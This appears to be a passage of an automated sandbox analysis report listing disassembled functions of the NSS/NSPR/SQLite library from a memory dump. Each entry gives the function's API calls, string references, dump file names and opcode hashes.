PR_SetError.NSS3(FFFFE022,00000000), ref: 6C74AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C869500), ref: 6C74AF23

Part of subcall function 6C79F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C79F0C8
Part of subcall function 6C79F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C79F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C74AF37

Strings

/G6/, xrefs: 6C74AE62

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID: /G6/
API String ID: 3714604333-570549270
Opcode ID: e02b4ffbb92339de90023dc1f438bc0a4a5f6f41305d2f78de38c5639b7fb32a
Instruction ID: 9774cf85c8aa0338aab920625c4d5834f6902626c9cc85c8817408950dd7ad35
Opcode Fuzzy Hash: e02b4ffbb92339de90023dc1f438bc0a4a5f6f41305d2f78de38c5639b7fb32a
Instruction Fuzzy Hash: E4214CB2909200ABE7108F189E05B9A7BE8AF8573CF148735FC249B7C1E731D90587A3

Function 6C7CEE50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7CEE85
realloc.MOZGLUE(E436472F,?), ref: 6C7CEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C7CEEC5

Part of subcall function 6C7A0BE0: malloc.MOZGLUE(6C798D2D,?,00000000,?), ref: 6C7A0BF8
Part of subcall function 6C7A0BE0: TlsGetValue.KERNEL32(6C798D2D,?,00000000,?), ref: 6C7A0C15

htonl.WSOCK32(?), ref: 6C7CEEE3
htonl.WSOCK32(00000000,?), ref: 6C7CEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C7CEF01

Strings

/G6/, xrefs: 6C7CEE62

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID: /G6/
API String ID: 1351805024-570549270
Opcode ID: ddf0f61b356c7270bc85cbf74178235067ec5f46885f831c50ff7860837ae288
Instruction ID: 25004e93d75cde3cc77aa1d1e871d7cc2d13e3c1b8f5495c6b8148b70b9c8d34
Opcode Fuzzy Hash: ddf0f61b356c7270bc85cbf74178235067ec5f46885f831c50ff7860837ae288
Instruction Fuzzy Hash: 8721E771B002199FDB209F28DD8579A77A8EF45398F148139EC199B641D330ED14C7E6

Function 6C758CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C76124D,00000001), ref: 6C758D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C76124D,00000001), ref: 6C758D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C76124D,00000001), ref: 6C758D73
PR_Unlock.NSS3(?,?,?,?,?,6C76124D,00000001), ref: 6C758D8C

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

PR_Unlock.NSS3(?,?,?,?,?,6C76124D,00000001), ref: 6C758DBA

Strings

KRAM, xrefs: 6C758D3E
KRAM, xrefs: 6C758CF9

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 7612c3d0937f51ef62aa96229d5159c29803996c5c4c49e100929c29aa1097fa
Instruction ID: 00aa2590d03366fba60b7c7817422b38fe6c94c81a958683f5b2cbf8cc782057
Opcode Fuzzy Hash: 7612c3d0937f51ef62aa96229d5159c29803996c5c4c49e100929c29aa1097fa
Instruction Fuzzy Hash: 5B2180B1A547018FCB40EF38C68955AB7F0FF59308F55897AD88887701DB35D851CB91

Function 6C850ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C850EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C850EFA

Part of subcall function 6C73AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C73AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C850F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C850F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C850F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C850F2B

Strings

Aborting, xrefs: 6C850EB3
Assertion failure: %s, at %s:%d, xrefs: 6C850ED9, 6C850EE5, 6C850F06, 6C850F0B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 48559f5d21a296270a43d10e1a02eb04261cf85a5e01322423e7963a74596906
Instruction ID: b44b2bc4989fe8df98991b9f55265a1484ec0b292ce915021214ea5aaf12176f
Opcode Fuzzy Hash: 48559f5d21a296270a43d10e1a02eb04261cf85a5e01322423e7963a74596906
Instruction Fuzzy Hash: 5301A1B59001146BDF216F58DD45C9B3B2CDF46368B404464FD0997652D772E924C6F2

Function 6C758B50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C760948,00000000), ref: 6C758B6B
EnterCriticalSection.KERNEL32(?,?,?,6C760948,00000000), ref: 6C758B80
PL_FinishArenaPool.NSS3(?,?,?,?,6C760948,00000000), ref: 6C758B8F
PR_Unlock.NSS3(?,?,?,?,6C760948,00000000), ref: 6C758BA1
DeleteCriticalSection.KERNEL32(?,?,?,?,6C760948,00000000), ref: 6C758BAC
free.MOZGLUE(?,?,?,?,?,6C760948,00000000), ref: 6C758BB8

Strings

Hvl, xrefs: 6C758B59

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$ArenaDeleteEnterFinishPoolUnlockValuefree
String ID: Hvl
API String ID: 1456478736-1297377090
Opcode ID: 6d3d03ce7882bd5e8fec4f13535ca018132d441ec7d461cc75266c9d41a88d70
Instruction ID: 50ed477b6144ed977c8f28d759b15c86739b510521cd0cd24245def5cd0c14a2
Opcode Fuzzy Hash: 6d3d03ce7882bd5e8fec4f13535ca018132d441ec7d461cc75266c9d41a88d70
Instruction Fuzzy Hash: DD114CF1A14A059FDB10BF78C18D16ABBF8FF05258F41493AD88587701EB35A4A9CBD2

Function 6C814D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C814DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C814DE0

Strings

invalid, xrefs: 6C814DB8
%s at line %d of [%.10s], xrefs: 6C814DDA
API call with %s database connection pointer, xrefs: 6C814DBD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C814DCB
misuse, xrefs: 6C814DD5

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 0171e52b738d4e2b5d069a2b4df068c2f93f6cbaa413511f2e3b90c044b41367
Instruction ID: 504cc94606ffe442c4cd175802124982795f1874484dd215006b1655f0b90b7a
Opcode Fuzzy Hash: 0171e52b738d4e2b5d069a2b4df068c2f93f6cbaa413511f2e3b90c044b41367
Instruction Fuzzy Hash: BDF02421A285696FDA304115CF11FCB37D54FC231EF1A0DA0ED046BF52E205985082A4

Function 6C814DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C814E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C814E4D

Strings

invalid, xrefs: 6C814E25
%s at line %d of [%.10s], xrefs: 6C814E47
API call with %s database connection pointer, xrefs: 6C814E2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C814E38
misuse, xrefs: 6C814E42

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: ff25d9aff6dcbe4f172a4777f1cdc69eb6e1a80637feb18664d42809ae44af11
Instruction ID: f68358b5107b644b0af630c05a09216d1e9da3a70e69e03b599ca0b2e7ba77cf
Opcode Fuzzy Hash: ff25d9aff6dcbe4f172a4777f1cdc69eb6e1a80637feb18664d42809ae44af11
Instruction Fuzzy Hash: E1F02711F4C9292BEA700125DF10FCB37C64BC273DF094CA1EE1A67F92E205986152F5

Function 6C736E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C736ED8
sqlite3_value_text.NSS3(?,?), ref: 6C736EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C736FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C736FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C736FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C737010
sqlite3_value_blob.NSS3(?,?), ref: 6C73701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C737052

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 5aa69d89f28aa181e9db864f86da8c9ed239aaa0bd70a0dae6bc357bcf884404
Instruction ID: 3d3c45f5772a1e043bb4fd1d86e4f17be48891429f6cbcf2cf07977e0cc70479
Opcode Fuzzy Hash: 5aa69d89f28aa181e9db864f86da8c9ed239aaa0bd70a0dae6bc357bcf884404
Instruction Fuzzy Hash: D261C2B1E1422A8BDB00CB68CF447EEB7B2BF85308F285174D418AB752E7369D15CB91

Function 6C7A8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C7A7313), ref: 6C7A8FBB

Part of subcall function 6C7A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C748298,?,?,?,6C73FCE5,?), ref: 6C7A07BF
Part of subcall function 6C7A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7A07E6
Part of subcall function 6C7A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A081B
Part of subcall function 6C7A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C7A7313), ref: 6C7A9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C7A7313), ref: 6C7A903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C7A7313), ref: 6C7A909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C7A7313), ref: 6C7A90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C7A7313), ref: 6C7A90F1

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C7A7313), ref: 6C7A906B

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C7A7313), ref: 6C7A9128

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 5228f7bcafca9c7e3230a1ed0f40d3afa531def3baf35afd79867bdf39b46db8
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 2351C371A002028FEB108FAADE48B27B3F5AF54398F154239D915D7B51EB32E812CB91

Function 6C764A10 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C765385,?,?,00000000), ref: 6C764A29
EnterCriticalSection.KERNEL32 ref: 6C764A42
TlsGetValue.KERNEL32 ref: 6C764A5F
EnterCriticalSection.KERNEL32 ref: 6C764A78
PL_HashTableLookup.NSS3 ref: 6C764A91
PR_Unlock.NSS3 ref: 6C764A9E
PR_Now.NSS3 ref: 6C764AAD
PR_Unlock.NSS3 ref: 6C764AD2

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 173f444a119c05f4e7d7fa58afa56a4575d82ab5c326f7cadeb47917693a6100
Instruction ID: e1a3ca8721c239490bbc6cd1cfdf0a1264178b57b46a46267a7141b7d7934df2
Opcode Fuzzy Hash: 173f444a119c05f4e7d7fa58afa56a4575d82ab5c326f7cadeb47917693a6100
Instruction Fuzzy Hash: C6315E75A00A149FCB10EF3DC18845ABBF0FF09358B058969EC8997B11EB30E894CBD1

Function 6C850860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C857AE2,?,?,?,?,?,?,6C85798A), ref: 6C85086C

Part of subcall function 6C850930: EnterCriticalSection.KERNEL32(?,00000000,?,6C850C83), ref: 6C85094F
Part of subcall function 6C850930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C850C83), ref: 6C850974
Part of subcall function 6C850930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850983
Part of subcall function 6C850930: _PR_MD_UNLOCK.NSS3(?,?,6C850C83), ref: 6C85099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C857AE2,?,?,?,?,?,?,6C85798A), ref: 6C85087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C857AE2,?,?,?,?,?,?,6C85798A), ref: 6C850892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C85798A), ref: 6C8508AA
free.MOZGLUE(?,00000000,00000000,?,?,6C857AE2,?,?,?,?,?,?,6C85798A), ref: 6C8508C7
free.MOZGLUE(?,00000000,00000000,?,?,6C857AE2,?,?,?,?,?,?,6C85798A), ref: 6C8508E9
free.MOZGLUE(?,6C857AE2,?,?,?,?,?,?,6C85798A), ref: 6C8508EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C857AE2,?,?,?,?,?,?,6C85798A), ref: 6C85090E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 671921c52cb8211b6e08cbf239a7157a30167238c5988dd9cd71b65215db4a8c
Instruction ID: 4ff678df091b3e2d167e14891aa67bf8349c27f82e10466be3d927dea9a368cf
Opcode Fuzzy Hash: 671921c52cb8211b6e08cbf239a7157a30167238c5988dd9cd71b65215db4a8c
Instruction Fuzzy Hash: ED1181B5B012608BEF709F98EE45B4A3778AB4125CF580534E406C7651DBB2E824CBD2

Function 6C6C2940 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C6C1360,00000000), ref: 6C6C2A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C6C1360,00000000), ref: 6C6C2A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C6C2A7C

Part of subcall function 6C6C2D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,E436472F,?,?,00000000,?,6C6C296E), ref: 6C6C2DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6C2AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C6C1360,00000000), ref: 6C6C2B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C6C2B90

Strings

/G6/, xrefs: 6C6C2951

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: /G6/
API String ID: 638109778-570549270
Opcode ID: 72c8bca268b6ad232844fba6763d3c4202a6f3c9b0427c729495652f1a3cf350
Instruction ID: b2819d97da0fdf46108423332a7e7ab57943ef43a939504e128bb09478b993ad
Opcode Fuzzy Hash: 72c8bca268b6ad232844fba6763d3c4202a6f3c9b0427c729495652f1a3cf350
Instruction Fuzzy Hash: D1C1B171F002068BEB04CF69C8987AAB7B5FF88318F159229DD199B741D734E841CBDA

